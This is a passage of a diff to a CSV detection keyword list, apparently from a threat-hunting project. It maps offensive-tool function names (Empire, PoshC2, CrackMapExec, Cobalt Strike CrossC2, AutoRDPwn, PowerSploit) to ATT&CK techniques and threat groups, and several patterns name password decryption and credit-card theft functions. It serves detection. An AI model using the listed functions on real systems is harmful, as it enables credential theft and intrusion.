T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","N/A","N/A","10","7102","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" -"*get-creditcarddata *","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","0","N/A","10","10","1601","312","2023-09-08T05:42:06Z","2018-07-23T08:53:32Z" +"*Get-ComputerDetails*","offensive_tool_keyword","crackmapexec","crackmapexec command lines patterns. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. CrackMapExec collects Active Directory information to conduct lateral movement through targeted networks","T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002","TA0002 - TA0006 - TA0007","N/A","APT39 - Dragonfly - FIN7 - MuddyWater","POST Exploitation tools","https://github.com/Porchetta-Industries/CrackMapExec","1","1","N/A","N/A","10","7683","1597","2023-09-09T14:19:36Z","2015-08-14T14:11:55Z" +"*GetComputersFromActiveDirectory*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","N/A","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*get-creditcarddata *","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","0","N/A","10","10","1602","312","2023-09-08T05:42:06Z","2018-07-23T08:53:32Z" "*Get-CredPersist*","offensive_tool_keyword","AutoRDPwn","AutoRDPwn is a post-exploitation framework created in Powershell designed primarily to automate the Shadow attack on Microsoft Windows computers","T1078 - T1021.001 - T1003.001 - T1547.009 - T1543.003 - T1056.001 - T1021.002","TA0004 - TA0003 - TA0006 - TA0002 - TA0008","N/A","N/A","Frameworks","https://github.com/JoelGMSec/AutoRDPwn","1","1","N/A","N/A","10","1009","830","2022-09-04T20:44:27Z","2018-07-29T08:22:20Z" "*getCrossC2Beacon*","offensive_tool_keyword","cobaltstrike","CrossC2 developed based on the Cobalt Strike framework can be used for other cross-platform system control. CrossC2Kit provides some interfaces for users to call to manipulate the CrossC2 Beacon session. thereby extending the functionality of Cobalt Strike.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/CrossC2/CrossC2Kit","1","1","N/A","10","10","155","25","2023-08-08T19:52:07Z","2022-06-06T07:00:10Z" "*getCrossC2Site*","offensive_tool_keyword","cobaltstrike","CrossC2 developed based on the Cobalt Strike framework can be used for other cross-platform system control. CrossC2Kit provides some interfaces for users to call to manipulate the CrossC2 Beacon session. thereby extending the functionality of Cobalt Strike.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/CrossC2/CrossC2Kit","1","1","N/A","10","10","155","25","2023-08-08T19:52:07Z","2022-06-06T07:00:10Z" -"*Get-DCBadPwdCount*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","Invoke-SMBAutoBrute.ps1","N/A","10","7102","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*Get-DCBadPwdCount*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","Invoke-SMBAutoBrute.ps1","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "*Get-DecodedPassword*","offensive_tool_keyword","AutoRDPwn","AutoRDPwn is a post-exploitation framework created in Powershell designed primarily to automate the Shadow attack on Microsoft Windows computers","T1078 - T1021.001 - T1003.001 - T1547.009 - T1543.003 - T1056.001 - T1021.002","TA0004 - TA0003 - TA0006 - TA0002 - TA0008","N/A","N/A","Frameworks","https://github.com/JoelGMSec/AutoRDPwn","1","1","N/A","N/A","10","1009","830","2022-09-04T20:44:27Z","2018-07-29T08:22:20Z" -"*Get-DecodedPassword*","offensive_tool_keyword","PrivescCheck","Privilege Escalation Enumeration Script for Windows","T1053 - T1088","TA0005 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/itm4n/PrivescCheck","1","1","N/A","N/A","10","2247","370","2023-09-03T15:14:46Z","2020-01-16T12:28:10Z" +"*Get-DecodedPassword*","offensive_tool_keyword","PrivescCheck","Privilege Escalation Enumeration Script for Windows","T1053 - T1088","TA0005 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/itm4n/PrivescCheck","1","1","N/A","N/A","10","2254","370","2023-09-03T15:14:46Z","2020-01-16T12:28:10Z" "*Get-DecryptedCpassword*","offensive_tool_keyword","AutoRDPwn","AutoRDPwn is a post-exploitation framework created in Powershell designed primarily to automate the Shadow attack on Microsoft Windows computers","T1078 - T1021.001 - T1003.001 - T1547.009 - T1543.003 - T1056.001 - T1021.002","TA0004 - TA0003 - TA0006 - TA0002 - TA0008","N/A","N/A","Frameworks","https://github.com/JoelGMSec/AutoRDPwn","1","1","N/A","N/A","10","1009","830","2022-09-04T20:44:27Z","2018-07-29T08:22:20Z" -"*Get-DecryptedCpassword*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","Get-SiteListPassword.ps1","N/A","10","7102","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*Get-DecryptedCpassword*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","Get-SiteListPassword.ps1","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "*Get-DecryptedPassword*","offensive_tool_keyword","AutoRDPwn","AutoRDPwn is a post-exploitation framework created in Powershell designed primarily to automate the Shadow attack on Microsoft Windows computers","T1078 - T1021.001 - T1003.001 - T1547.009 - T1543.003 - T1056.001 - T1021.002","TA0004 - TA0003 - TA0006 - TA0002 - TA0008","N/A","N/A","Frameworks","https://github.com/JoelGMSec/AutoRDPwn","1","1","N/A","N/A","10","1009","830","2022-09-04T20:44:27Z","2018-07-29T08:22:20Z" -"*Get-DecryptedPassword*","offensive_tool_keyword","PrivescCheck","Privilege Escalation Enumeration Script for Windows","T1053 - T1088","TA0005 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/itm4n/PrivescCheck","1","1","N/A","N/A","10","2247","370","2023-09-03T15:14:46Z","2020-01-16T12:28:10Z" -"*Get-DecryptedSitelistPassword*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","Get-SiteListPassword.ps1","N/A","10","7102","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*Get-DecryptedPassword*","offensive_tool_keyword","PrivescCheck","Privilege Escalation Enumeration Script for Windows","T1053 - T1088","TA0005 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/itm4n/PrivescCheck","1","1","N/A","N/A","10","2254","370","2023-09-03T15:14:46Z","2020-01-16T12:28:10Z" +"*Get-DecryptedSitelistPassword*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","Get-SiteListPassword.ps1","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "*get-delegation *All*","offensive_tool_keyword","DelegationBOF","This tool uses LDAP to check a domain for known abusable Kerberos delegation settings. Currently. it supports RBCD. Constrained. Constrained w/Protocol Transition. and Unconstrained Delegation checks.","T1098 - T1214 - T1552","TA0006","N/A","N/A","Credential Access","https://github.com/IcebreakerSecurity/DelegationBOF","1","0","N/A","N/A","10","115","21","2022-05-04T14:00:36Z","2022-03-28T20:14:24Z" "*get-delegation *Unconstrained*","offensive_tool_keyword","DelegationBOF","This tool uses LDAP to check a domain for known abusable Kerberos delegation settings. Currently. it supports RBCD. Constrained. Constrained w/Protocol Transition. and Unconstrained Delegation checks.","T1098 - T1214 - T1552","TA0006","N/A","N/A","Credential Access","https://github.com/IcebreakerSecurity/DelegationBOF","1","0","N/A","N/A","10","115","21","2022-05-04T14:00:36Z","2022-03-28T20:14:24Z" -"*Get-DFSshare*","offensive_tool_keyword","PowerSploit","PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. PowerSploit is comprised of the following modules and scripts","T1059 - T1053 - T1003 - T1114 - T1204","TA0002 - TA0008 - TA0011","N/A","N/A","Frameworks","https://github.com/PowerShellMafia/PowerSploit","1","0","N/A","10","10","10978","4550","2020-08-17T23:19:49Z","2012-05-26T16:08:48Z" +"*Get-DFSshare*","offensive_tool_keyword","PowerSploit","PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. PowerSploit is comprised of the following modules and scripts","T1059 - T1053 - T1003 - T1114 - T1204","TA0002 - TA0008 - TA0011","N/A","N/A","Frameworks","https://github.com/PowerShellMafia/PowerSploit","1","0","N/A","10","10","10981","4550","2020-08-17T23:19:49Z","2012-05-26T16:08:48Z" "*Get-DiscosdurosGet-PSDrive*","offensive_tool_keyword","AutoRDPwn","AutoRDPwn is a post-exploitation framework created in Powershell designed primarily to automate the Shadow attack on Microsoft Windows computers","T1078 - T1021.001 - T1003.001 - T1547.009 - T1543.003 - T1056.001 - T1021.002","TA0004 - TA0003 - TA0006 - TA0002 - TA0008","N/A","N/A","Frameworks","https://github.com/JoelGMSec/AutoRDPwn","1","1","N/A","N/A","10","1009","830","2022-09-04T20:44:27Z","2018-07-29T08:22:20Z" -"*getdllbaseaddress*","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","1","N/A","10","10","1601","312","2023-09-08T05:42:06Z","2018-07-23T08:53:32Z" -"*get-dodgyprocesses*","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","1","N/A","10","10","1601","312","2023-09-08T05:42:06Z","2018-07-23T08:53:32Z" +"*getdllbaseaddress*","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","1","N/A","10","10","1602","312","2023-09-08T05:42:06Z","2018-07-23T08:53:32Z" +"*get-dodgyprocesses*","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","1","N/A","10","10","1602","312","2023-09-08T05:42:06Z","2018-07-23T08:53:32Z" "*Get-DomainAdmins.ps1*","offensive_tool_keyword","ScriptSentry","ScriptSentry finds misconfigured and dangerous logon scripts.","T1037 - T1037.005 - T1046","TA0005 - TA0007","N/A","N/A","Credential Access","https://github.com/techspence/ScriptSentry","1","0","N/A","7","1","44","3","2023-08-16T19:32:24Z","2023-07-22T03:17:58Z" "*Get-DomainComputer -TrustedToAuth | select name","offensive_tool_keyword","AD exploitation cheat sheet","msds-allowedtodelegateto*","T1595 - T1590 - T1591 - T1213 - T1039 - T1592","N/A","N/A","N/A","Lateral movement","https://casvancooten.com/posts/2020/11/windows-active-directory-exploitation-cheat-sheet-and-command-reference","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" -"*Get-DomainDFSShareV1*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","powerview.ps1","N/A","10","7102","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" -"*Get-DomainDFSShareV2*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - 